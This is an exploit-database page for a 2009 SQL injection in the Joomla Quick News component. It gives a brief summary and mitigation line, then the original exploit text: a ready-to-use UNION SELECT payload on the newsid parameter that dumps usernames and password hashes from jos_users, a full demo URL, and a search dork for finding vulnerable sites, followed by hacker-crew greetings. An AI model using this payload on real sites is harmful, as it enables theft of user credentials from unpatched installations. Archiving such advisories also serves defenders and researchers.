header-logo
Suggest Exploit
vendor:
Quick News
by:
Don Tukulesto
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Quick News
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:bhavesh_chauhan:quicknews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component Quick News SQL injection vulnerability

A SQL injection vulnerability exists in the Joomla Component Quick News. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

/**************************************************************************

[!] Joomla Component Quick News SQL injection vulnerability
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://www.indonesiancoder.com
[!] Date	: November 25, 2009
[!] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Download : http://joomlacode.org/gf/project/quicknews/
[+] Developer Info : Bhavesh Chauhan
[+] Description : Get The Quick News On the Joomla Interface. 
[+] Development Status: 1 - Planning
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
[+] Dork : intitle:"kaMtiEz"+"tukulesto"

===========================================================================

[ Here we go.. Proof of Concept ]

http://server/index.php?option=com_quicknews&task=view_item&newsid=[INDONESIANCODER]

[ Exploit ]

33/**/union/**/select/**/1,1,1,1,concat%28username,0x3a,password%29,666,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2/**/from/**/jos_users/*

[ D3M0 ]

http://server/index.php?option=com_quicknews&task=view_item&newsid=33/**/union/**/select/**/1,1,1,1,concat%28username,0x3a,password%29,666,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2/**/from/**/jos_users/*

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!

[ Not ALLOWED ! ] 

[+] FOR MALINGSIAL


[ QUOTE ]

[+] kaMtiEz : Ada yang nyelip lg !!! lol~
[+] Thank you to ALL OF YOU called me piece of shit, especially for High school friends